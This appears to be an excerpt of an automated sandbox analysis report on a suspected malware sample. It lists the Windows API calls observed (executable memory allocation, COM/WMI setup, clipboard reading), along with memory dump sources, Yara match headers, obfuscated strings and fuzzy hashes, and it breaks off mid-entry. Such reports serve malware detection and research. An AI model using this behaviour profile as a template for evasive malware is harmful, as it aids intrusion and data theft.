• RtlFreeHeap.NTDLL(?,00000000,?,0043C1D6,?,0040B2E4,00000000,00000001), ref: 0043AABE
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
• Instruction ID: 16971ee2c2e030bf17817a0d81dc477e65560ccac1e7abaabcdfe7fdc6775186
• Opcode Fuzzy Hash: 6bd8f6e4c03da58ea1ddb055db28ee6a0cd2fda4e2937b11b34eec233391d5a2
• Instruction Fuzzy Hash: B2D01231505522EBC6102F25FC06B863A58EF0E761F0748B1B4006B071C765ECA186D8

Control-flow Graph
• Node 220: 43aa80-43aa97, call 43d810 (RtlAllocateHeap)
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,0043C1C0), ref: 0043AA90
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
• Instruction ID: 72b53a506d10aa35cab301047588232e26feb19e762ad2a100d4e8a4b6eb39e1
• Opcode Fuzzy Hash: 733e1922efac4f9a0d584a8944a64cd40278d35b25fcdbd161a554f2c268bb95
• Instruction Fuzzy Hash: D6C09231445220BBCA143B16FC09FCA3F68EF4D762F0244A6F514670B2CB61BCA2CAD8
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004704B6
Memory Dump Source
• Source File: 00000000.00000002.2488177075.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Offset: 00470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_470000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: a0bfb27cbe6de90053606688358b4ba16acdfac2ce2fc8a29e6b2121caff52c3
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 6F113F79A40208EFDB01DF98C985E99BBF5AF08350F05C095F9489B362D375EA50DF84
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
• Opcode ID: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
• Instruction ID: f086b17abffa5a23de60675b3e35e143f4d24521fa3f36365588902221ef9ede
• Opcode Fuzzy Hash: 10d440d78822d09e0470b5f34489f211c766880f4e3e3e7e2fe2868a43d71886
• Instruction Fuzzy Hash: B013AC3150C7C08AD3359B38C4543DFBBE1ABD6314F188A6EE4E9873C2D6B989858B57
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: $!$($+$,$.$/$0$0$1$1$1$1$2$3$3$4$5$5$7$7$8$9$:$;$<$<$=$>$>$?$?$?$@$@$@$B$B$D$D$D$F$J$L$L$N$P$R$T$U$V$W$X$X$Y$Z$[$[$\$]$^$_$`$`$b$b$d$f$f$g$j$o$o$q$r$r$s$u$v$v$x${$|
• API String ID: 0-561599860
• Opcode ID: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
• Instruction ID: 6bc0c0bd1fe77db173058f24fa9824335b24732d1e5cf2b1f0a45ec82fb05afa
• Opcode Fuzzy Hash: 5d0905d9e0f91c5c418c3ecbfefb3f90c6b7c7927ba12d209d8fa4479d815a2e
• Instruction Fuzzy Hash: BA138A3150C7C18AD3359B3884583AFBBE1ABD6324F188A6DE4E9873C2D7798945CB53
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
• API String ID: 0-168325148
• Opcode ID: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
• Instruction ID: 6b3287e7d647f6fc9aa8d330ed56109632cb450684d46cb972cc03f30992e160
• Opcode Fuzzy Hash: dffcdbe7c59816050bcb47420a350e77fe25c9c65786c839b5995c95da9d8176
• Instruction Fuzzy Hash: 15D19F2090C7D98EDB22C77C884439EBFA15B67324F1882DDD4E96B3D2C3B94946C766
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: -$.$0$1$4$5$:$=$@$B$D$F$G$H$J$L$N$N$P$R$T$V$X$Z$\$\$^$i$p$q$x$z${$|$~
• API String ID: 0-168325148
• Opcode ID: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
• Instruction ID: 2ded239b1ef1d41844eea38ed136c927c6da0c0f67fe42f3cbb109069deecc93
• Opcode Fuzzy Hash: 1931f6c8ecb165f1204fd7e146898a82d55f5c0f38f6d6832a679dd5bdd43d7e
• Instruction Fuzzy Hash: 5DD1B12090C7D98EDB22C77C884839DBFA15F67328F1882D8D4E96B3D2C3794946C766
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: !$*W.Y$+K!M$;[0]$>C7E$FOEH$NO$U'g)$UGBY$bweM$g#X%$l+X-$w?n!${7y9$$&$EG
• API String ID: 0-3492884535
• Opcode ID: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
• Instruction ID: ba39798a3fcb6da663dd5afd8d89a9a5fc3f4f782173f0556435d4ff5b4d5338
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5e16a26193487a4bdaa5a93cbbb181080dd0d43d457804532e7adee19b2f1ec1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3E10EB4608350CFD7249F25E85176FBBF2FB86304F45896DE5D88B252D7388906CB4A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00438034
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 004380C3
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438101
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0043817E
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 00438238
                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 004382A8
                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 004383F9
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 0043841D
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 00438423
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00438430
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                        • API String ID: 2485776651-1397720406
                                                                                                                                                                                                                                                        • Opcode ID: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                        • Instruction ID: 8d1c6a9ba2bf63fa8fe487279597ba15b590cfaf954231a8494ef46f424a72d4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99389cd6846ffddf47e3914131a3c94635c8c48cfc52d90ecef9ec7663b7e69d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D022EFB2A483418BD314CF25C880B5BBBE5EFC9704F148A2DF5919B381E779D909CB96
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK$tv
                                                                                                                                                                                                                                                        • API String ID: 0-2608794092
                                                                                                                                                                                                                                                        • Opcode ID: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                        • Instruction ID: 95d7e76cba02f0a09582511e26c4ad00c8044fe5fc0ebc2eb1bbe37e4d815997
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21657e5fc834c3ca3d925c669eca665cb77afa54e23a7c0446644a9599fb4a76
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3792C6B59053298BDB24CF59D8887EEBBB1FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$$%$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-1300133108
                                                                                                                                                                                                                                                        • Opcode ID: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                        • Instruction ID: f0effb65835d2d2e0694896053be4e203788fa5b6255ab66f53faa1eae535f9a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58fd2d3b485852ad044d2fcd85ff715361975f915949706d7940c7d1c4703da1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-1893782281
                                                                                                                                                                                                                                                        • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                        • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-2118368390
                                                                                                                                                                                                                                                        • Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                        • Instruction ID: de3520e2196d7f16f07d2ed474497cbb7c0ad1bcb3588638f17d59b7a347a8b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3232FCB48463698ADBA5CF5599883CDBB70FB51304F2082D8C46D3B264DBB50BC6CF85
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0076829B
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0076832A
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00768368
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 007683E5
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0076849F
                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 0076850F
                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00768660
• SysFreeString.OLEAUT32(00000000), ref: 00768697
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
• String ID: P%R$)\"^$.H4J$O@$pq
• API String ID: 2775254435-1397720406
• Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
• Instruction ID: ef236122cb2238395e7789a0392efe4c2a91aae8037fc91385731e8a7db1d679
• Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
• Instruction Fuzzy Hash: F322EFB2A483508BD314CF24C884B5BBBE5FFC5704F148A2DE9969B281DB79D905CB92
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
• Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
• Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID:
• String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
• API String ID: 0-1290103930
• Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction ID: 27aa406251b7acaabd84928f985f4e30d58d5bd7cdc390510748012931b83fa3
• Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
• Instruction Fuzzy Hash: EEA1D37020D3D18BD316CF6984A076BBFE1AF97714F184AACE5D54B382D37A890AC752
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
• API String ID: 0-1763234448
• Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
• Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
• Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
• Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
• API String ID: 0-1826372655
• Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
• Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
• Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
• Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
APIs
  • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
• FreeLibrary.KERNEL32(?), ref: 0041A6BD
• FreeLibrary.KERNEL32(?), ref: 0041A77B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: / $/,-$46
• API String ID: 764372645-479303636
• Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
• Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
• Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
• Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
Yara matches
Similarity
• API ID: FreeLibrary
• String ID: / $/,-$46
• API String ID: 3664257935-479303636
• Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
• Instruction ID: eb6f137ecbe2ce4dfd70e26d739a4eb9df084e83cd7ee5930c6309e2db6f0543
• Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
• Instruction Fuzzy Hash: 09B256B6688340AFE3208F95C88477BBBD2ABD5300F1CC82DE9D59B211D7799C459B93
Strings
Memory Dump Source
• Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
Similarity
• API ID:
• String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
• API String ID: 0-3328159043
• Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
• Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
• Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
• Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
Strings
Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                        • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                        • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                        • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                        • Instruction ID: fd1756fe1aae61b4aca309ddb76119725af3889cb1ed020667d70c6525be08ef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD1397265C7549BD324CF24C8526ABBBE2EBC1304F1D896DE4D58B386D639C906CB83
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
